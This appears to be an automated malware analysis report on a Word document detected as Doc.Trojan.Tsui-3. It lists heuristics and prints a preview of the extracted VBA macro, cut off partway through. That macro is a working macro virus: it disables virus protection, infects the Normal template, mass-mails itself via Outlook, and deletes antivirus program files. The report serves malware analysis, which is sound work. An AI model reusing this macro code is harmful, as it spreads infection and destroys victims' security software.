Verdict: MALICIOUS
Risk Score: 220
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1105 Ingress Tool Transfer
The sample is a malicious OLE document containing VBA macros, specifically an AutoOpen macro that attempts to execute code. Heuristics indicate the use of CreateObject and p-code execution, suggesting the macro is designed to download and run a secondary payload. The ClamAV detection name 'Doc.Trojan.Tsui-3' further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Trojan.Tsui-3 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Trojan.Tsui-3
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15724 bytes | 2ee09dd91432e22384723bdc314172c63197fbe58795f57c932506fad4a60827 |
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'³o¬O¤@°¦¥Î¨Ó¬ã¨s¥Îªºµ{¦¡,°ò¥»¤W¤£·|³y¦¨¥ô¦ó¹q¸£ªº¶Ë®`
'§Æ±æ¯à´£¨Ñµ¹¦³¿³½ì¬ã¨s¥¨¶°µ{¦¡ªº¤H
'§Ú¤£¹ªÀy±z§ó§ï³oÓµ{¦¡
'¥H§K³y¦¨¥L¤H¶Ë®`
'§Þ³N:ÁͶլì§Þ´£¨Ñ(¬ö©s§»¥ý¥Í¤j§@¥¨¶°¯f¬r§¹¥þ¯}¸Ñ¤â¥U),·L³n¤ä´©(¦UÃþvba¤â¥U)
'§@ªÌ:®çªá®q¥D
On Error Resume Next
Options.VirusProtection = Chr(48): Options.SaveNormalPrompt = Chr(48): Options.ConfirmConversions = Chr(48)
havevir = 0
doc = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.countoflines
nor = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.countoflines
If nor > Abs(havevir) And doc > Abs(havevir) Then GoTo tsuicy
If nor = Abs(havevir) Then
Set norset = NormalTemplate.VBProject.VBComponents
Set docset = ActiveDocument.VBProject.VBComponents
docset.Item(1).Name = norset.Item(1).Name
docset.Item(1).Export Windows.Application.Path & ".dll"
End If
If doc = Abs(havevir) Then Set norset = ActiveDocument.VBProject.VBComponents
norset.Item(1).codemodule.AddFromFile Windows.Application.Path & ".dll"
With norset.Item(1).codemodule
For j = Chr(49) To Chr(52)
.deletelines 1
Next j
End With
If nor = Abs(havevir) And doc = Abs(havevir) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
tsuicy:
If nor <> Abs(havevir) And doc = Abs(havevir) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Tasks.Exists("Microsoft Outlook") = True Then
'MsgBox "outlook is running"
Set myoutapp = CreateObject("outlook.application")
Set mynamespace = myoutapp.getnamespace("MAPI")
Set myinboxfolder = mynamespace.getdefaultfolder(6)
Set myitems = myinboxfolder.items
For j = 1 To myitems.Count
Set myitem = myitems(j)
Set newitem = myoutapp.createitem(0)
newitem.Subject = "³Ì¨üÅwªï¥D¼½°Ý¨é½Õ¬d"
newitem.body = "½Ð¶ñ§´°Ý¨éE-MAIL¦^tvbs·s»D³¡,§Ú̱N°e±zNOKIA 8810¤â¾÷¤@°¦"
newitem.To = myitem.SenderName
newitem.attachments.Add ActiveDocument.FullName
'newitem.Display
newitem.send
Next
Set new1item = myoutapp.createitem(0)
new1item.Subject = "§Ú¥þ¤O¤ä«ù½±¶®²N"
new1item.body = "¥þ¥xÆW³ÌÀuªº¥D¼½´N¬O©p°Õ.......§Ú¤ä«ù©p"
new1item.To = "vivian_chiang@mail.ftv.com.tw"
new1item.send
End If
If Day(Now) = 30 And Month(Now) = 6 Then
MsgBox "±Z§g¿Phappy birthday"
End If
Dim str1file As String
str1file = Dir("c:\program files\", vbDirectory)
Do Until str1file = ""
If str1file = "Norton AntiVirus" Then
str2 = "c:\program files\" & str1file
'MsgBox "norton is found"
With Application.FileSearch
.LookIn = str2
.SearchSubFolders = False
.FileName = "*.*"
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
str1file = Dir
Loop
Dim pcfile As String
pcfile = Dir("c:\program files\", vbDirectory)
Do Until pcfile = ""
pcdir = Left(pcfile, 10)
If pcdir = "Trend PC-c" Then
pcstr2 = "c:\program files\" & pcfile
'MsgBox "pc-cllin is found"
With Application.FileSearch
.LookIn = pcstr2
.SearchSubFolders = False
.FileName = "*.*"
If .Execute() > 0 Then
For i = 1 To .FoundFiles.Count
Kill .FoundFiles(i)
Next i
End If
End With
End If
'MsgBox str1file
pcfile = Dir
Loop
lo:
With Assistant.NewBalloon
.Heading = "³Ì¨üÅwªï¥D¼½°Ý¨é"
.Text = "þ¤@¦ì¬O¥xÆW³ÌÄꪺ¹qµø¥D¼½?"
.Checkboxes(1).Text = "§õ¥|ºÝ"
.Checkboxes(2).Text = "¨H¬KµØ"
.Checkboxes(3).Text = "À¹©¾¤¯"
.Checkboxes(4).Text = "±i¶®µ^"
.Checkboxes(5).Text = "½±¶®²N"
.Button = msoButtonSetOK
.Show
Select Case True
Case .Checkboxes(1).Checked
MsgBox "¥L¤£ºâÄê,ÁÙ®¼¦³½s¿è¯à¤O": GoTo lo
Case .Checkboxes(2).Checked
MsgBox "¦oÁöµMÄê,«o«D³ÌÄê,˼ƲĤG¦Ó¤w": GoTo lo
Case .Checkboxes(3).Checked
MsgBox "Áö±`¦YÁ³µ·,¥u¬O´¶³qÄê": GoTo lo
Case .Checkboxes(4).Checked
MsgBox "¨S¿ù!¥þ¥xÆW³ÌÄꪺ¹qµø¥D¼½´N¬O¦o-±i¶®µ^"
Case .Checkboxes(5).Checked
MsgBox "§ÚªY½àªº¥D¼½,¦³¤~®ð,¤£¿ù®@": GoTo lo
Case
... (truncated)